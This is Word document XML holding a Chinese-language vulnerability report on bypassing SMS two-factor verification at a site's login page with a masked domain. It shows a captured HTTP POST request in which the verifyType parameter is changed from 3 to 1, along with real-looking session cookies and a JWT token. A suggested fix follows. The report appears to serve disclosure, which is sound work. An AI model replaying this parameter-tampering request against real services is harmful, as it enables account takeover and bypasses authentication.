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ascii="arial" w:hAnsi="arial" w:cs="arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31412E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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漏洞URL：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https://www.</w:t>
      </w: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xxxx</w:t>
      </w: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.com/en/login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</w:pP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简要描述：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正常注册成功后二次登录，会有一个验证码验证是否是本人登录</w:t>
      </w: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 xml:space="preserve">, </w:t>
      </w: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我们可以绕过这个登录</w:t>
      </w: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.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</w:pP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漏洞证明：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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6076315" cy="3336925"/>
            <wp:effectExtent l="0" t="0" r="1968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 send 发送验证码后 随便输入123456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</w:rPr>
      </w:pP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抓包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</w:rPr>
      </w:pP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verifyType参数默认为3 验证短信验证码失败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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3629025"/>
            <wp:effectExtent l="0" t="0" r="1270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修改为1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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3629025"/>
            <wp:effectExtent l="0" t="0" r="1270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  <w:t>cookie信息 成功返回登陆成功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  <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5261610" cy="2889250"/>
            <wp:effectExtent l="0" t="0" r="2159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</w:rPr>
      </w:pP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漏洞利用代码：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POST /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xxxx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/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xxxx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/user/login HTTP/1.1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Host: www.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xxxx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.com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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0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Accept: application/json, text/plain, */*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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate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Content-Type: application/json;charset=utf-8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CC-TOKEN: l/6l83fBk28F7s9Y/GzjIgysw+Oj0Qchwgr4LEGQ4ugyVX5bkErsNpVjzkDm0p8/xXel0BrLtVnWeomYPb4OWROBgjChCwAziPE50Vs=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Content-Length: 672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Origin: https://www.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xxxx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.com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Connection: close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Referer: https://www.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xxx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.com/en/login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Cookie: C-TOKEN-KEY=CC-TOKEN; C-TOKEN-KEY.sig=LJxhdf5U8PlQBgWgjGIKpViLL90; C-TOKEN-VALUE=l/6l83fBk28F7s9Y/GzjIgysw+Oj0Qchwgr4LEGQ4ugyVX5bkErsNpVjzkDm0p8/xXel0BrLtVnWeomYPb4OWROBgjChCwAziPE50Vs=; C-TOKEN-VALUE.sig=xXbzt0nnJvU_rFZn6GN9ZaAhnjU; C-TOKEN-EXPIRETIME=1615126859256; C-TOKEN-EXPIRETIME.sig=2IuLGgPUDqB6e4gAXcXyVjVQ3v4; C-TOKEN-EXPIREInterval=60000; C-TOKEN-EXPIREInterval.sig=X5dt52DJUcTkcNm8zNUy70b7Pnk; _ga_Z8Q93KHR0F=GS1.1.1615125736.1.1.1615126627.0; _ga=GA1.2.782881567.1615125737; gdxidpyhxdE=ViGe%5CbcwqQyD4qyTZ6hyesKMBHIRsmrfE58VSvBfSrX7MMTkbHKyT3YUDX8%5ClRwEbdNVGwyQ8eMzU%5C18X%2BXSz5R%2FHtVg8tmfzzLLA4dLYYfmB3eITkfjOqBenClrNRHyOxuk08yO7vqbAWGf0zj5neGI7ENNxCY5jhoKWkQ%2FAo7Eiy5l%3A1615127478269; _9755xjdesxxd_=32; _gid=GA1.2.372338717.1615125739; YD00635511674906%3AWM_NI=k%2F6CZkaX4g1HdOlmkLBIEfcB%2BSrftNs3SmhS9cJRRRMUB1LedTyvP06%2BQiSXG8%2FKr0n2r7FJMxT4TSW6D8iDZVVeiw5i0rCePVC1NTvm0dNd3cvLa5YZ772904oydiZNaDE%3D; YD00635511674906%3AWM_NIKE=9ca17ae2e6ffcda170e2e6eeabd05ca88e99ccd67df2968bb6d54e828b9e85b6648388b9d8f839f5ae8ed8c72af0fea7c3b92aa9f1faa4d961a388fc88b444a891a48eea4882978b87e24ae98dbe87f746b1ed9d8eeb59fbbd86b3d15a8f8b8ed2cf6fa88cb797d33cf6f59f8ad25485e8e1acf13caeeebed8c5428fa89cd5d75995ea8cd9ec509a8a9a86ec7df7b70093c26f948a8dd2cd60b6b30085cd70f1bdbaade43f9b86f9d8b133f4eca19ae7639a92afa5c837e2a3; YD00635511674906%3AWM_TID=1AUgN%2BCZIUVEFEAFFRZ7lFCl%2Bv2urUvS; __zlcmid=12zjrWCjmgNYlDE; __snaker__id=Msapn5fhkiFU9KLn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{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiI2ZjBjNTdhOC02MmQxLTRhMmMtOThiMS01YTU4OWFmY2FmZDUxODI0MTc1ODU5IiwidWlkIjoidW45OEJIQWhFUi8vSzA0WDlHNzNzUT09Iiwic3ViIjoiMzEyMTcxKioqKkBxcS5jb20iLCJpcCI6Ii9mQnBXME5vcWxVOE5iSHpTVzVtV2c9PSIsImRpZCI6ImRka1NMR1VDak9Sd1pFdU1rMFlaMWc9PSIsInN0cyI6MiwiaWF0IjoxNjE1MTI2NjU3LCJleHAiOjE2MTUxMjcyNTcsInB1c2hpZCI6ImRka1NMR1VDak9Sd1pFdU1rMFlaMWc9PSIsImlzcyI6InVwZXgifQ.SOs62u8_s4z8JV1RPSq6S76XALRBDyvh7FAWD0X6rWg","verifyCode":"123456","verifyKey":"dtZlM2/QKkUkLOUbJHoGgNm52oM/fdKcdpOiQ+tGVkOHI8TC+dk97AS2T0UZt2GzU90Komz7pp0VjldZbuNw+aG2hgYSo3KVQRUHnQTMrwM=","verifyType":1,"terminalCode":"245ff9926424f34e3e3f7e1211c00844","languageType":0}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cs="arial"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31412E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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修复方案：</w:t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br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:ascii="arial" w:hAnsi="arial" w:cs="arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31412E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>隐藏认证参数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E3FE7D"/>
    <w:rsid w:val="FBE3F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2021-04-13T14:39:00Z</dcterms:created>
  <dc:creator>ooxx</dc:creator>
  <cp:lastModifiedBy>ooxx</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-13T15:31:26Z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